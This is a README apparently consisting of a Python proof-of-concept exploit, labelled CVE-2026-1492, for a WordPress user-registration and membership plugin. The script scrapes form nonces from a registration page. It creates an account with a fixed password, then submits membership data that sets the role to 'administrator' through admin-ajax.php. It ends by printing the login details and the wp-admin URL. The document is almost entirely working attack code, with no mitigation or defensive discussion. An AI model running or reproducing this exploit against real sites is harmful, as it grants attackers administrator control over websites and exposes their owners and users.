README.md
Rendering markdown...
import requests
import re
import random
import argparse
import textwrap
import json
from bs4 import BeautifulSoup
# =========================
# COLORS
# =========================
GREEN = "\033[92m"
RED = "\033[91m"
YELLOW = "\033[93m"
RESET = "\033[0m"
def info(msg):
print(f"{YELLOW}[*]{RESET} {msg}")
def success(msg):
print(f"{GREEN}[+]{RESET} {msg}")
def error(msg):
print(f"{RED}[-]{RESET} {msg}")
# =========================
# GENERATION USER
# =========================
USERNAME = "user" + str(random.randint(1000, 9999))
EMAIL = USERNAME + "@gmail.com"
PASSWORD = "pass"
form_data = [
{"field_name": "user_login", "value": USERNAME, "field_type": "text", "label": "Username"},
{"field_name": "user_email", "value": EMAIL, "field_type": "email", "label": "User Email"},
{"field_name": "user_pass", "value": PASSWORD, "field_type": "password", "label": "User Password"},
{"field_name": "user_confirm_password", "value": PASSWORD, "field_type": "password", "label": "Confirm Password"}
]
# =========================
# EXTRACTION TOKENS + MEMBERSHIP
# =========================
def extract_all(session, url):
r = session.get(url)
html = r.text
soup = BeautifulSoup(html, "html.parser")
form_id = None
frontend_nonce = None
security = None
wpnonce = None
membership_id = None
for inp in soup.find_all("input"):
name = inp.get("name")
value = inp.get("value")
if value:
if name == "ur-user-form-id":
form_id = value
if name == "ur_frontend_form_nonce":
frontend_nonce = value
if inp.get("type") == "radio" and inp.get("name") == "urm_membership":
membership_id = value
js_content = ""
for script in soup.find_all("script"):
content = script.string or script.get_text()
if not content:
continue
if "user_registration_params" in content:
js_content += content
if "ur_membership_frontend_localized_data" in content:
js_content += content
match = re.search(r'var user_registration_params = (\{.*?\});', js_content, re.DOTALL)
if match:
data = json.loads(match.group(1))
security = data.get("user_registration_form_data_save")
match = re.search(r'var ur_membership_frontend_localized_data = (\{.*?\});', js_content, re.DOTALL)
if match:
data = json.loads(match.group(1))
wpnonce = data.get("_nonce")
return form_id, frontend_nonce, security, wpnonce, membership_id
# =========================
# MAIN
# =========================
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='CVE-2026-1492 Exploit',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent('''Example:
python3 poc.py -t http://localhost:5000 -ru http://localhost:5000/?page_id=6
''')
)
parser.add_argument('-t', '--target', required=True)
parser.add_argument('-ru', '--registration-url', required=True)
parser.add_argument('--debug', action='store_true', help='Show raw requests')
args = parser.parse_args()
session = requests.Session()
headers = {
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.9",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Origin": args.target,
"Referer": args.registration_url,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36",
"X-Requested-With": "XMLHttpRequest"
}
# =========================
# EXTRACTION
# =========================
info("Extracting tokens...")
form_id, frontend_nonce, security, wpnonce, membership_id = extract_all(session, args.registration_url)
success(f"form_id: {form_id}")
success(f"frontend_nonce: {frontend_nonce}")
success(f"security: {security}")
success(f"wpnonce: {wpnonce}")
success(f"membership_id: {membership_id}")
# =========================
# REGISTER
# =========================
info("Sending registration request...")
ajax_url = args.target + "/wp-admin/admin-ajax.php"
payload1 = {
"action": "user_registration_user_form_submit",
"security": security,
"form_data": json.dumps(form_data),
"form_id": form_id,
"registration_language": "en-US",
"ur_frontend_form_nonce": frontend_nonce
}
r1 = session.post(ajax_url, headers=headers, data=payload1)
try:
r1_json = r1.json()
if r1_json.get("success"):
success(f"User created: {USERNAME}")
else:
error("Registration failed")
except:
error("Invalid response (not JSON)")
# =========================
# MEMBERSHIP / EXPLOIT
# =========================
info("Sending membership request...")
members_data = {
"role": "administrator",
"membership": membership_id,
"payment_method": "free",
"start_date": "2026-3-20",
"switched_currency": "\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t",
"urm_zone_id": "\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t",
"username": USERNAME
}
form_response = {
"username": USERNAME,
"success_message_positon": 1,
"redirect_timeout": 0,
"form_login_option": "default",
"registration_type": "membership"
}
payload2 = {
"action": "user_registration_membership_register_member",
"members_data": json.dumps(members_data),
"form_response": json.dumps(form_response),
"_wpnonce": wpnonce
}
r2 = session.post(ajax_url, headers=headers, data=payload2)
try:
r2_json = r2.json()
if r2_json.get("success"):
success("Membership applied → possible privilege escalation\n")
info(f"Try logging in with:")
print(f" Username: {USERNAME}")
print(f" Password: {PASSWORD}\n")
info(f"Then access:")
print(f" {args.target}/wp-admin/")
else:
error("Membership failed")
except:
error("Invalid response (not JSON)")
# =========================
# DEBUG
# =========================
if args.debug:
print("\n[DEBUG] Request body:")
print(r2.request.body)
print("\n[DEBUG] Response:")
print(r2.text)